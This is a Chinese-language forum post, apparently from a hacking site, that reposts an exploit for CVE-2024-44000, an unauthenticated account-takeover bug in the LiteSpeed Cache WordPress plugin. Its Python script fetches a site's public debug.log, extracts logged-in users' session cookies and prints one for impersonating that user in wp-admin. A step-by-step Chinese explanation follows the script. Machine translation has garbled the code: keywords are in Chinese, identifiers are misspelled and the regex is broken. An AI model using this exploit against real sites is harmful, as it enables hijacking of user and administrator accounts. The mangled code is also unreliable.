H

Litespeed Cache 6.5.0.1-身份验证旁路

HackApt-37 Team已验证会员

黑客倉庫站長

贡献: 83%
#利用标题: Litespeed未经授权的帐户收购
#Google Dork: [如果适用,]
#Date:在2024年9月17日报告
#利用作者: gnzls
#供应商homepage3360 https://www.litespeedtech.com/
#软件link: https://github.com/gbrsh/cve-2024-44000?
#版本: 6.5.0.1
#测试在: MacOS M2 Pro
#CVE : CVE-2024-44000
导入
导入系统
导入请求
导入argparse
从urllib.parse导入urljoin
def extract_latest_cookies(log_content):
user_cookies={}
pattern_cookie=re.compile(r'cookie: \ s。*?wordpress_logged_in _ [^=]+=(。
对于log_content.splitlines():中的行
cookie_match=pattern_cookie.search(line)
如果Cookie_match:
用户名=cookie_match.group(1)
USER_COOKIES [用户名]=行
返回user_cookies
def select_user(user_cookies):
用户=list(user_cookies.keys())
如果不是用户:
打印(“找不到用户”。)
sys.exit(1)
#显示用户选项
打印(“选择一个用户为模仿:')
对于IDX,用户枚举(用户):
打印(f'{idx + 1}。{user}')
#获取用户的选择
选择=int(输入('pick a number:')) - 1
如果0=选择Len(用户):
返回用户[选择],user_cookies [用户[选择]
其他:
打印(“无效选择。”)
sys.exit(1)
打印('--- Litespeed帐户收购利用---')
打印('(未经授权的帐户访问)')
打印('\ t \ t \ tby gonzales')
Parser=argparse.argumentparser()
parser.add_argument('url',help='http://Wphost')
如果len(sys.argv)==1:
parser.print_help()
sys.exit(1)
args=parser.parse_args()
log_file_url=urljoin(args.url,'wp-content/debug.log')
响应=requests.get(log_file_url)
if antsphy.status_code==200:
log_content=response.text
ucookies=extract_latest_cookies(log_content)
选择,cookie=select_user(ucookies)
打印(f'go to {args.url}/wp-admin/并设置此cookie:')
打印(cookie.split(']')[1])
其他:
打印(“找不到日志文件。”)
sys.exit(1)
1。概述:目的和目标
该脚本旨在从WordPress debug.log文件中提取cookie(包含会话信息),从而使攻击者能够模仿登录的用户并无权访问其帐户。
2。代码如何工作
extract_latest_cookies函数:
pelime:此函数扫描debug.log文件的内容,并使用正则表达式提取cookie for已记录的WordPress用户。
它如何工作:
该功能读取debug.log文件的每一行。
它搜索包含cookie的行使用以下正则表达式: cookie: \ s。*?wordpress_logged_in _ [^=]+=(。
此模式与WordPress登录cookie匹配并提取用户名和cookie值。
提取的cookie值存储在称为user_cookies的字典中,其中键是用户名,而值是相应的cookie字符串。
select_user函数:
pelime:一旦提取了cookie,此功能允许攻击者选择用于模拟的用户的cookie。
它如何工作:
它检查是否有任何用户(即cookie)可用。
如果找不到cookie,它将打印一条消息并退出程序。
如果找到cookie,它将打印一个用户列表,并要求攻击者选择一个。
选择用户后,该功能将返回该用户的相应cookie。
主要程序:
pelime:脚本的主要部分处理了检索debug.log文件,提取cookie并允许攻击者选择要模拟哪个用户的工作流程。
它如何工作:
该脚本将URL作为输入,即目标WordPress站点(例如http://Wphost)。
它将URL构造到debug.log文件(http://wphost/wp-content/debug.log)。
该脚本将HTTP请求发送到此URL以获取日志文件。
如果找到文件(响应状态200),则将文件内容传递给extract_latest_cookies函数以提取cookie。
攻击者选择要使用哪种用户的cookie,脚本打印了cookie信息。
然后,攻击者可以使用此cookie通过将其设置在浏览器中并访问WordPress管理面板(/WP-ADMIN/)来模仿所选用户。
请求Library:
该库用于将HTTP请求发送到目标站点并检索debug.log文件。
ArgParse Library:
这允许用户从命令行输入目标WordPress URL。
sys.exit()函数:
该脚本在发生错误的情况下使用此脚本将其退出程序,例如当找不到用户或无法访问日志文件时。
3。滥用的潜力
该脚本通过针对公开访问的debug.log文件来利用WordPress中的漏洞。如果网站对记录进行了错误配置,则该文件可能可用于Internet上的任何人。通过访问debug.log文件,攻击者可以提取敏感的会话cookie,模仿用户并获得对WordPress帐户(包括管理员帐户)的未经授权访问。
 
后退
顶部